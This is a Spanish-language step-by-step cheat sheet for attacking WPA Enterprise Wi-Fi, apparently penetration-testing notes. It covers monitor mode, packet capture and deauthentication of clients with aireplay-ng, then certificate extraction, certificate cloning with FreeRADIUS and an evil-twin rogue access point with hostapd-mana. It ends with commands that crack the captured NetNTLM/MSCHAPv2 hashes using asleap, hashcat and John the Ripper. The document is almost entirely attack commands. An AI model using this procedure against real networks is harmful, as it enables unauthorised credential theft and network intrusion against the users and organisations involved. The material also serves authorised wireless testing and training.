1) Habilitar modo monitor en tarjeta inalámbrica.
Copiar sudo airmon-ng check kill && sudo airmon-ng start < interfac e > && iw dev < interface-mo n > info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info
2) Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
MGT = tipo de autenticación WPA Enterprise.
Copiar sudo airodump-ng < interface-mo n >
3) Captura de paquetes de BSSID, ESSID y canal especÃfico.
Copiar sudo airodump-ng < interface-mo n > --bssid < BSSI D > --essid < ESSI D > -c < channe l > -w < file-nam e > --output-format pcap
Desautenticación de cliente(s).
Copiar # Desautenticación dirigida
sudo aireplay-ng -0 1 -a < BSSI D > -c < client-mac-addres s > < interface-mo n >
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a < BSSI D > < interface-mo n >
4) Deshabilitar modo monitor en tarjeta inalámbrica.
Copiar sudo airmon-ng stop < interface-mo n > && iw dev < interfac e > info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info
5) Obtención de certificados.
Copiar wireshark < file-nam e > .cap
5.1) Aplicar filtro de visualización.
Copiar wlan.bssid == <bssid> && eap && tls.handshake.certificate
5.2) Exportar y guardar certificados.
Extensible Authentication Protocol -> Transport Layer Security -> TLSvX Record Layer: Handshake Protocol: Certificate -> Handshake Protocol: Certificate -> Certificates
Clic derecho -> Export Packet Bytes -> guardar certificado con extensión .der
.
5.3) Obtener información del certificado y verificar su fecha de vencimiento.
Copiar openssl x509 -inform der -in < certificate-filenam e > .der -text | more
openssl x509 -in < certificate-filenam e > .der -noout -enddate
6) Instalación de FreeRADIUS.
Copiar sudo apt install freeradius
6.1) Configuración de certificado ca.cnf
.
Copiar sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf
Copiar [certificate_authority]
countryName = < countryNam e >
stateOrProvinceName = < stateOrProvinceNam e >
localityName = < localityNam e >
organizationName = < organizationNam e >
emailAddress = < emailAddres s >
commonName = < commonNam e >
6.2) Configuración de certificado server.cnf
.
Copiar sudo -s
cd /etc/freeradius/3.0/certs
nano server.cnf
Copiar [server]
countryName = < countryNam e >
stateOrProvinceName = < stateOrProvinceNam e >
localityName = < localityNam e >
organizationName = < organizationNam e >
emailAddress = < emailAddres s >
commonName = < commonNam e >
6.3) Generación de certificados.
Copiar sudo -s
cd /etc/freeradius/3.0/certs
rm dh
make
Si ejecutamos make
pero los certificados ya existen, no podremos sobrescribirlos. Tenemos que ejecutar make destroycerts
para limpiar primero.
7) Instalación y configuración de hostapd-mana.
Copiar sudo apt install hostapd-mana
7.1) Creación y configuración de archivo rogue-ap.conf
.
Copiar sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.conf
7.2) Creación y configuración de archivo rogue-ap.eap_user
.
Copiar sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.eap_user
8) Inicio de rogue access points.
Copiar sudo hostapd-mana /etc/hostapd-mana/rogue-ap.conf
9) Cracking.
Copiar # asleap
asleap -C < challeng e > -R < respons e > -W < path-wordlis t >
# Hashcat
hashcat -m 5500 hash.txt < path-wordlis t >
hashcat -m 5500 hash.txt --show
# John the Ripper
john --format=netntlm --wordlist= < path-wordlist > hash.txt
john --format=netntlm hash.txt --show
Última actualización hace 1 año